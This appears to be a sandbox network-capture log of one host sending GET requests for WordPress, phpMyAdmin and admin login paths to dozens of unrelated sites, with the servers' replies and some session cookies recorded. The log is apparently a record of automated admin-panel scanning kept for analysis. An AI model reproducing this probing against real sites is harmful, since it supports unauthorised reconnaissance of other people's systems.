Cookie: bonga20120608=df106ebcbffc1861ca322b6f3f8633ab; ts_type2=1; __cf_bm=hYI9uaB5o1Z9vOPanp05auLoaQukIGLPJXDgF1LPBXk-1707131770-1-AV82M4ZN3NGdbY1RWqCn2CYbGXaWAtlSiuSCRk+M1uMz6ANcyYTABpz0ar3eNHcldxpImA+s0kWuevSh8Lkq75k=; uh=FyE6pTEiExAnn0c6AKy6A2cAoJquHD==; fv=ZQp3ZGZkAmN3ZD==
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  758                IN         HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
referrer-policy: origin-when-cross-origin
x-ua-compatible: IE=edge,chrome=1
set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:12 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
set-cookie: reg_ver2=3; expires=Tue, 04-Feb-2025 11:16:12 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
cache-control: no-cache, no-store, must-revalidate
x-zone: 3-ded1806-web12
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abd677c5653ab-ATL
alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port
196         192.168.2.6  65344        138.197.59.199  443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  178                OUT        GET /admin HTTP/1.1
Host: api.cmrsanmartin.ziz.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  192                IN         HTTP/1.1 307 Temporary Redirect
Date: Mon, 05 Feb 2024 11:16:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: https://api.cmrsanmartin.ziz.cl/admin/
Content-Length: 0
Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port
197         192.168.2.6  65424        3.141.96.53      443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  175                OUT        GET /wp-login.php HTTP/1.1
                                                       Host: money-farm.cc
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  113                IN         HTTP/1.1 439 <none>
                                                       date: Mon, 05 Feb 2024 11:16:12 GMT
                                                       content-length: 0
                                                       server: NginX
                                                       connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port
198         192.168.2.6  65445        201.134.41.61    443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  237                OUT        GET /academico/login HTTP/1.1
                                                       Host: academico.um.edu.mx
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       Cookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  407                IN         HTTP/1.1 200
                                                       Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                       Server: Apache/2.4.29 (Ubuntu)
                                                       X-Content-Type-Options: nosniff
                                                       X-XSS-Protection: 1; mode=block
                                                       Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                       Pragma: no-cache
                                                       Expires: 0
                                                       X-Frame-Options: SAMEORIGIN
                                                       Content-Type: text/html;charset=ISO-8859-1
                                                       Content-Language: es-MX
                                                       Content-Length: 2695
                                                       Vary: Accept-Encoding
                                                       Connection: close
2024-02-05 11:16:12 UTC  2695               IN         Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Sistema Acadmico</title><link rel="SHORTCUT ICON" href="imagenes/icoAc.png"><link href="loginStyle.css" rel="STYLESHEET" type="text/cs


Session ID  Source IP    Source Port  Destination IP   Destination Port
199         192.168.2.6  65427        31.13.88.1       443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  180                OUT        GET /wp-login.php HTTP/1.1
                                                       Host: th-th.facebook.com
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  390                IN         HTTP/1.1 302 Found
                                                       Location: https://m.facebook.com/wp-login.php?locale=th_TH&_rdr
                                                       Strict-Transport-Security: max-age=15552000; preload
                                                       Content-Type: text/html; charset="utf-8"
                                                       X-FB-Debug: 0/N4lH0Q3iw7nZpo/7nNdCznBmKuOXM4gzfaOBdgso7NdZu8uNITWaqgDBflS1LslMsMMITQZ6TiRCCE/yPzUQ==
                                                       Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                       Alt-Svc: h3=":443"; ma=86400
                                                       Connection: close
                                                       Content-Length: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
200         192.168.2.6  65532        188.212.100.154  443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  173                OUT        GET /wp-login.php HTTP/1.1
                                                       Host: zarkana2.ro
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  415                IN         HTTP/1.1 404 Not Found
                                                       Connection: close
                                                       cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                       pragma: no-cache
                                                       content-type: text/html
                                                       content-length: 796
                                                       date: Mon, 05 Feb 2024 11:17:38 GMT
                                                       server: LiteSpeed
                                                       alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-02-05 11:16:12 UTC  796                IN         Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


Session ID  Source IP    Source Port  Destination IP   Destination Port
201         192.168.2.6  65304        87.233.198.20    443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  184                OUT        GET /wp-admin/ HTTP/1.1
                                                       Host: idp.uitgeverij-deviant.nl
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  976                IN         HTTP/1.1 404 Not Found
                                                       cache-control: no-store,no-cache
                                                       pragma: no-cache
                                                       transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                server:
                                                                                                                                                                                                                                                                                                                                                                request-context: appId=cid-v1:72342c18-c46f-45ce-b189-a032422cefba
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self';script-src 'self' 'sha256-7F67Tt3rqGzZ4RuGnAw8xbWeXLl7P0SNrI9EOIYYRdw=' 'nonce-VGkIlrwC+3QyRKgUNfGm9ZbTZRACXydeodCKpguaaQ8=';style-src 'self';font-src 'self' fonts.gstatic.com;img-src 'self' data: https://www.gravatar.com/avatar/;media-src 'none';object-src 'none';frame-ancestors 'self';frame-src 'self';report-uri https://uitgeverijdeviant.report-uri.com/r/t/csp/enforce
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By:
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                set-cookie: SERVERID=api04; path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                connection: close
2024-02-05 11:16:12 UTC  2114               IN         Data Ascii: 836<!DOCTYPE html><html lang="nl-NL"> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"/> <link rel="apple-touch-icon" sizes="180x180" href="/app


Session ID  Source IP    Source Port  Destination IP  Destination Port
202         192.168.2.6  49433        31.13.65.1      443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  296                OUT        GET /wp-admin/ HTTP/1.1
Host: hi-in.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: datr=e8PAZQti-we2Cxw2VrrmnDbW; ps_n=0; ps_l=0
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
2024-02-05 11:16:12 UTC  387                IN         HTTP/1.1 302 Found
Location: https://m.facebook.com/wp-admin/?locale=hi_IN&_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: NRLKoY5Ig+fFwMndlzbTpcNuF2H8nwepVplLQAg5qNBozHcNKqbEof3r8VwtmesXpyBUWVTgv9I6VLoVMkpP0w==
Date: Mon, 05 Feb 2024 11:16:12 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
203         192.168.2.6  49387        31.13.65.1      443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  178                OUT        GET /wp-login.php HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  377                IN         HTTP/1.1 302 Found
Location: https://m.facebook.com/wp-login.php?_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: MebsYkB8zzbOCtOTFQRQBGmjSc369cdjAwJWGKNoJK/S6OlcxrIRkPZnW587F1fdYMINhyCkkmUHR9DhrUsYDQ==
Date: Mon, 05 Feb 2024 11:16:12 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
204         192.168.2.6  65313        3.161.136.2     443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  182                OUT        GET /en/wp-admin/ HTTP/1.1
Host: accounts.binance.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  928                IN         HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Mon, 05 Feb 2024 11:16:12 GMT
Server: Tuser
Accept-Ranges: bytes
Cache-Control: no-store, max-age=0, must-revalidate
ETag: "65bd03dd-f119"
Last-Modified: Fri, 02 Feb 2024 15:01:49 GMT
Set-Cookie: theme=dark; Path=/; Domain=binance.com
X-Cache-Proxy: hit
X-Cache-Proxy-Key: cpv2_gzip_e86434c508c20485933072836cba016a
X-Cluster-Info: fe-com-r1
X-Envoy-Decorator-Operation: cache-proxy.cache-proxy.svc.cluster.local:80/*
X-Envoy-Upstream-Service-Time: 2
X-Gateway: traefik
X-Trace-Id: 8ff76971352147b0966f625d21e44f27
X-Traefik-Duration: 1.00
Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 69511c9d4d06d08392dd2d9b02ccc678.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: S8QZccpTl-M-yC2bocuhdZSZVG7S92uVjYvfrdrrap1U3-7ZHWf74w==
2024-02-05 11:16:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
205 | 192.168.2.6 | 65355 | 54.183.63.241 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 223 | OUT | GET /admin/ HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: osCsid=75ead7575354d04015590554959bc526
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 385 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-imvu-rnd: t9JEtZkUablDLu
2024-02-05 11:16:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
206 | 192.168.2.6 | 65347 | 3.134.125.175 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 191 | OUT | GET /wp-login.php HTTP/1.1
Host: 3fba-180-252-166-236.ngrok.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 249 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Ngrok-Error-Code: ERR_NGROK_3200
Ngrok-Trace-Id: 169cb534faad350189f757c618bb163a
Referrer-Policy: no-referrer
Date: Mon, 05 Feb 2024 11:16:12 GMT
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
2024-02-05 11:16:12 UTC | 1498 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


Session ID | Source IP | Source Port | Destination IP | Destination Port
207 | 192.168.2.6 | 65330 | 3.161.150.69 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 229 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://account.booking.com/wp-login.php
2024-02-05 11:16:12 UTC | 2006 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=66eb4f3ea1ce0020&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgYlaHb_J0puoUASp75a9AaRRwRm3ctDSQm_-HPXLzmPf
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=66eb4f3ea1ce0020&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgYlaHb_J0puoUASp75a9AaRRwRm3ctDSQm_-HPXLzmPf; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-FOWWK9SvFjgKUvT' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 bf188cee1e2fac0ecb107645c3d93c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: wXUZINQaatCd78UWLYkxUD0dijY5KYV3A5pceGZv7rL9-BABEeQvMw==
2024-02-05 11:16:12 UTC | 16384 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
2024-02-05 11:16:12 UTC | 5568 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: fix":"+378"},{"country_code":"sn","name":"Senegal","prefix":"+221"},{"prefix":"+252","name":"Somalia","country_code":"so"},{"name":"Suriname","country_code":"sr","prefix":"+597"},{"prefix":"+211","country_code":"ss","name":"South Sudan"},{"country_code":"
2024-02-05 11:16:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
208 | 192.168.2.6 | 65345 | 104.255.105.79 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 185 | OUT | GET /PhpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 1463 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                DBI: 361d5494ff4f0facced5b8cd63e19204ad3e4503
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src *.rockstargames.com s.rsg.sc; script-src 'nonce-LRBBBD8+VpKDtfNAmM5R5trGW5YJ8tMdVX2Oaw/gMCE=' 'report-sample' *.rockstargames.com s.rsg.sc cdn.cookielaw.org www.google-analytics.com *.googletagmanager.com rockstar-api.arkoselabs.com rockstar-api.arkoselabs.cn recaptcha.net; img-src https:; frame-src *.arkoselabs.com recaptcha.net; connect-src *.rockstargames.com *.google-analytics.com *.doubleclick.net *.sentry.io *.lifeinvader.com *.analytics.google.com *.googletagmanager.com cdn.cookielaw.org geolocation.onetrust.com privacyportal.onetrust.com; style-src 'unsafe-inline' *.rockstargames.com s.rsg.sc translate.googleapis.com; object-src 'none'; font-src fonts.gstatic.com; report-uri https://scapi.rockstargames.com/report/cspViolation;
                                                                                                                                                                                                                                                                                                                                                                CorrelationId: dc52f76b-9837-48af-ac26-391b8f313bff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: session-id=c568be51-be80-4e1b-a2d5-d7f1bde5e0c2; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=Edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS01a305c4=01e681cfdbcc45e3b815028857b7a6558226fb4fe859527e83a5ab96170672d5ccaa0b4451370c7d745aa9564f748001118093969008c38f0fe55c6cc028694910022e6495; Path=/
2024-02-05 11:16:12 UTC | 2538 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lte IE 10 ]><html class="ielt10" lang="en-US"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html class="" lang="en-US">...<![endif]--><head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="u
2024-02-05 11:16:12 UTC | 571 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ":"prod","errorReporting":{"enabled":true,"sampleRate":1.0,"ignoreErrors":[],"denyUrls":[],"allowUrls":["^https:\\/\\/(?!www).*\\.rockstargames\\.com","^https:\\/\\/(signin-)?s\\.rsg\\.sc"]},"performanceTracing":{"enabled":true,"sampleRate":0.0025,"includ


Session ID | Source IP | Source Port | Destination IP | Destination Port
209 | 192.168.2.6 | 65348 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 181 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:12 UTC | 1252 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5Hkf7fZNEfNrfFSb5bDDXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:12 UTC | 397 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
210 | 192.168.2.6 | 65449 | 170.114.52.2 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 337 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 1349 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=aw1;rid=WEB_0330e18c9c77fa80b793ad17d9a32752
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-qxWD7W5jToKGTvJe1Q9q2w' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
